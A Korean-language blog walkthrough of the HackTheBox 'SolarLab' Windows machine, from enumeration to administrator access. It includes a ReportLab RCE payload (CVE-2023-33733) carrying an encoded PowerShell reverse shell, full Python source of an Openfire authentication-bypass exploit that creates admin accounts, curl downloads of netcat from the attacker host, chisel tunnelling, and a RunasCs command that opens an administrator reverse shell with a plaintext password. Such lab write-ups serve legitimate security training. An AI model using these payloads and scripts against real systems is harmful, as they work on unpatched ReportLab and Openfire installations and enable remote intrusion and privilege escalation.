1. 정찰
#nmap
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -sCV -p 80,135,139,445,6791 10.129.33.115
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 21:10 KST
Nmap scan report for 10.129.33.115
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-28T12:11:13
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.52 seconds
#gobuster
#smb
smb 서비스 떠있는것 봤으니, 연결 시도
└─# smbclient -L 10.129.33.115
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.33.115 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Documents 폴더 접근 시도
└─# smbclient //10.129.33.115/Documents
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Apr 26 23:47:14 2024
.. DR 0 Fri Apr 26 23:47:14 2024
concepts D 0 Fri Apr 26 23:41:57 2024
desktop.ini AHS 278 Fri Nov 17 19:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 21:27:21 2023
My Music DHSrn 0 Fri Nov 17 04:36:51 2023
My Pictures DHSrn 0 Fri Nov 17 04:36:51 2023
My Videos DHSrn 0 Fri Nov 17 04:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 19:35:57 2023
7779839 blocks of size 4096. 1894614 blocks available
smb: \>smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> get desktop.ini
getting file \desktop.ini of size 278 as desktop.ini (0.2 KiloBytes/sec) (average 3.9 KiloBytes/sec)
smb: \> get old_leave_request_form.docx
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (25.4 KiloBytes/sec) (average 10.4 KiloBytes/sec)
smb: \>
파일 다운로드 후 xlsx 파일 확인 시 계정 및 비밀번호 확인 가능
계정 정보를 알아 냈으니,
crackmapexec 을 사용하여, 사용자 계정에 대해 더 뎁스 있게 샆펴 봄
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# crackmapexec smb 10.129.33.115 -u 'user' -p 'PASS' --rid-brute
SMB 10.129.33.115 445 SOLARLAB [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.129.33.115 445 SOLARLAB [+] solarlab\user:PASS
SMB 10.129.33.115 445 SOLARLAB [+] Brute forcing RIDs
SMB 10.129.33.115 445 SOLARLAB 500: SOLARLAB\Administrator (SidTypeUser)
SMB 10.129.33.115 445 SOLARLAB 501: SOLARLAB\Guest (SidTypeUser)
SMB 10.129.33.115 445 SOLARLAB 503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB 10.129.33.115 445 SOLARLAB 504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.33.115 445 SOLARLAB 513: SOLARLAB\None (SidTypeGroup)
SMB 10.129.33.115 445 SOLARLAB 1000: SOLARLAB\blake (SidTypeUser)
SMB 10.129.33.115 445 SOLARLAB 1001: SOLARLAB\openfire (SidTypeUser)
blake 개발자에 대한 계정이 있으며, nmap을 통해서 알아낸
http://report.solarlab.htb:6791/ 계정 접속 시도
계정이 전부 접근이 안되지만,
blake.bake 만 .bake로 되어 있는것 발견 로그인 수행 및
메뉴 중 pdf generate 가 있어 시도 해봄
2. Exploit
reportlab 프로그램 사용 중이며, 취약점 검색
https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897
reportlab is a Python library for generating PDFs and graphics.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient checks in the ‘rl_safe_eval’ function. Attackers can inject malicious code into an HTML file that will later be converted to PDF using software that relies on the ReportLab library. To exploit the vulnerability, the entire malicious code must be executed with eval in a single expression.
CVE 2023-33733
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAwACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
캐릭터 제한이 있어서, 제한이 없는 pdf 제네레이터를 선택하여,
burp 로 인터셉트 후 실행
D:\pentestSW\netcat-win32-1.11\netcat-1.11>nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.60] from (UNKNOWN) [10.129.33.115] 51788
PS C:\Users\blake\Documents\app> dir
Directory: C:\Users\blake\Documents\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/2/2024 12:30 PM instance
d----- 5/28/2024 4:16 PM reports
d----- 11/17/2023 10:01 AM static
d----- 11/17/2023 10:01 AM templates
d----- 5/28/2024 4:45 PM __pycache__
-a---- 11/17/2023 9:59 AM 1278 app.py
-a---- 11/16/2023 2:17 PM 315 models.py
-a---- 11/18/2023 6:59 PM 7790 routes.py
-a---- 5/2/2024 6:26 PM 3352 utils.py
PS C:\Users\blake\Documents\app> cd ..
PS C:\Users\blake\Documents> cd ..
PS C:\Users\blake> PS C:\Users\blake> cd Desktop
PS C:\Users\blake\Desktop> dir
Directory: C:\Users\blake\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/28/2024 3:04 PM 34 user.txt
PS C:\Users\blake\Desktop> type user.txt
3. Enumeration
net user {user명}
PS C:\Users\Administrator> net user blake
User name blake
Full Name
Comment
User's comment
Country/region code 001 (United States)
Account active Yes
Account expires Never
Password last set 11/17/2023 2:05:12 PM
Password expires Never
Password changeable 11/17/2023 2:05:12 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/28/2024 3:04:42 PM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
PS C:\Users\Administrator> net user openfire
User name openfire
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/17/2023 3:05:19 PM
Password expires Never
Password changeable 11/17/2023 3:05:19 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/28/2024 3:03:44 PM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
openfire 챗팅 서버로
Most administration of the server is done through a web interface, which runs on the ports 9090 (HTTP) and 9091 (HTTPS) by default. Administrators can connect from anywhere and edit the server and configuration settings.
9090, 9091에서 서비스 수행 중
4. Post Exploit
9090 서비스에 붙고 싶으나,
첫째, ui 를 사용할 수없고,
둘째, local pc에서 공격 서버로 포트가 막혀 있어 접근이 불가능
따라서, 리버스 프록시로 포트포워딩 수행
chisel 을 이용하여 터널링 수행
우선 chisel.exe 파일을 리버스 쉘로 다운로드 수행 필요
https://github.com/jpillora/chisel/releases/tag/v1.9.1(윈도우 amd64 아키텍처 용)
## 참고로 여기선 kex 로 wsl2 linux gui로 진행
1) 리눅스 서버에 python -m http.server 80 띄움
2) curl http://10.10.14.60/chisel.exe -o c:\windows\temp\test\chisel.exe
3) chisel server -p 8888 --reverse (로컬 pc)
4) ./chisel client 10.10.14.60:8888 R:9090:127.0.0.1:9090 (공격 대상 윈도우 pc)
# openfire 취약점
https://github.com/miko550/CVE-2023-32315
import random
import string
import argparse
from concurrent.futures import ThreadPoolExecutor
import HackRequests
artwork = '''
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
'''
def generate_random_string(length):
charset = string.ascii_lowercase + string.digits
return ''.join(random.choice(charset) for _ in range(length))
def between(string, starting, ending):
s = string.find(starting)
if s < 0:
return ""
s += len(starting)
e = string[s:].find(ending)
if e < 0:
return ""
return string[s : s+e]
final_result = []
def exploit(target):
hack = HackRequests.hackRequests()
host = target.split("://")[1]
# setup 1: get csrf + jsessionid
jsessionid = ""
csrf = ""
try:
url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "close",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"DNT": "1",
"X-Forwarded-For": "1.2.3.4",
"Upgrade-Insecure-Requests": "1"
}
print(f"[..] Checking target: {target}")
hh = hack.http(url, headers=headers)
jsessionid = hh.cookies.get('JSESSIONID', '')
csrf = hh.cookies.get('csrf', '')
if jsessionid != "" and csrf != "":
print(f"Successfully retrieved JSESSIONID: {jsessionid} + csrf: {csrf}")
else:
print("Failed to get JSESSIONID and csrf value")
return
# setup 2: add user
username = generate_random_string(6)
password = generate_random_string(6)
header2 = {
"Host": host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "close",
"Cookie": f"JSESSIONID={jsessionid}; csrf={csrf}",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"DNT": "1",
"X-Forwarded-For": "1.2.3.4",
"Upgrade-Insecure-Requests": "1"
}
create_user_url= f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
hhh = hack.http(create_user_url, headers=header2)
if hhh.status_code == 200:
print(f"User added successfully: url: {target} username: {username} password: {password}")
with open("success.txt", "a+") as f:
f.write(f"url: {target} username: {username} password: {password}\n")
else:
print("Failed to add user")
# setup 3: add plugin
except Exception as e:
print(f"Error occurred while retrieving cookies: {e}")
def main():
print(artwork)
## parse argument
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The URL of the target, eg: http://127.0.0.1:9090', default=False)
parser.add_argument("-l", "--list", action="store", help="List of target url saperated with new line", default=False)
args = parser.parse_args()
if args.target is not False:
exploit(args.target)
elif args.list is not False:
with open(args.list) as targets:
for target in targets:
target = target.rstrip()
if target == "":
continue
if "http" not in target:
target = "http://" + target
exploit(target)
else:
parser.print_help()
parser.exit()
# def main():
# parser = argparse.ArgumentParser(description="CVE-2023-32315")
# parser.add_argument("-u", help="Target URL")
# parser.add_argument("-l", help="File containing URLs")
# parser.add_argument("-t", type=int, default=10, help="Number of threads")
# args = parser.parse_args()
# target_url = args.u
# file_path = args.l
# thread = args.t
# targets = []
# if target_url is None:
# with open(file_path, "r") as file:
# for line in file:
# target = line.strip()
# if target == "":
# continue
# if "http" not in target:
# target = "http://" + target
# targets.append(target)
# with ThreadPoolExecutor(max_workers=thread) as executor:
# for target in targets:
# executor.submit(exploit, target)
# else:
# exploit(target_url)
if __name__ == "__main__":
main()
코드 분석 해보면
'plugin-admin.jsp'에 직접 접근한 다음 POST 요청을 통해 JAR 플러그인을 업로드하여 JSESSIONID 및 CSRF 토큰을 추출하는 방법으로 새로운 계정 생성
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# git clone https://github.com/miko550/CVE-2023-32315.git
Cloning into 'CVE-2023-32315'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 31 (delta 15), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (31/31), 38.13 KiB | 9.53 MiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# cd CVE-2023-32315/
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/CVE-2023-32315]
└─# pip3 install -r requirements.txt
Collecting HackRequests (from -r requirements.txt (line 1))
Downloading HackRequests-1.2-py3-none-any.whl.metadata (677 bytes)
Downloading HackRequests-1.2-py3-none-any.whl (7.3 kB)
Installing collected packages: HackRequests
Successfully installed HackRequests-1.2
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/CVE-2023-32315]
└─# ls
CVE-2023-32315.py openfire-management-tool-plugin.jar README.md requirements.txt
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers/CVE-2023-32315]
└─# python3 CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node038elmv73----------.node0 + csrf: GaxiphXxb93vqvm
User added successfully: url: http://127.0.0.1:9090 username: ie---- password: zy----
로그인 성
git 에서 다운받은
server=> server setting => management tool 클릭 후 로그인 수행
시스템 커멘드 입력 칸에 리버스쉘 명령어 입력
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.60] from (UNKNOWN) [10.129.33.115] 51968
PS C:\Program Files\Openfire\bin> dir
Directory: C:\Program Files\Openfire\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/17/2023 2:11 PM extra
-a---- 11/9/2022 6:00 PM 379904 openfire-service.exe
-a---- 2/16/2022 5:55 PM 795 openfire.bat
-a---- 11/9/2022 6:00 PM 370688 openfire.exe
-a---- 11/9/2022 6:00 PM 370688 openfired.exe
PS C:\Program Files\Openfire\bin> whoami
solarlab\openfire
5. 권한 상승
RunacCs.exe 를 이용해서 admin 권한으로 cmd 커멘드 입력 가능하며, nc 를 이용해 admin 권한으로 shell 연결
S C:\windows\temp\tets> curl http://10.10.14.60/nc.exe -o c:\windows\temp\tets\n.exe
PS C:\windows\temp\tets> dir
Directory: C:\windows\temp\tets
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/28/2024 10:00 PM 36528 n.exe
-a---- 5/28/2024 9:49 PM 0 nc.exe
-a---- 5/28/2024 9:38 PM 51712 RunasCs.exe
PS C:\windows\temp\tets> ./RunasCs.exe
[-] Not enough arguments. 3 Arguments required. Use --help for additional help.
PS C:\windows\temp\tets> ./RunasCs.exe Administrator ThisPasswordShouldDo!@ "c:\windows\temp\tets\n.exe -e cmd.exe 10.10.14.60 1235"
─# nc -nlvp 1235
listening on [any] 1235 ...
connect to [10.10.14.60] from (UNKNOWN) [10.129.33.115] 52040
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
solarlab\administrator
C:\Windows\system32>cd Users\
cd Users\
The system cannot find the path specified.
C:\Windows\system32>cd c:\Users\Administroatr
cd c:\Users\Administroatr
The system cannot find the path specified.
C:\Windows\system32>cd c:\Users
cd c:\Users
c:\Users>cd Administraotr
cd Administraotr
The system cannot find the path specified.
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd desktop
cd desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 385E-AC57
Directory of c:\Users\Administrator\Desktop
05/03/2024 02:32 PM <DIR> .
05/03/2024 02:32 PM <DIR> ..
05/28/2024 03:04 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,744,577,536 bytes free
성공!
'Hacking > HackTheBox' 카테고리의 다른 글
| Union (Linux) (1) | 2024.06.27 |
|---|---|
| pov (win) (0) | 2024.06.12 |
| Giddy (0) | 2024.05.15 |
| escape(windows) (1) | 2024.04.16 |
| support (0) | 2024.04.03 |
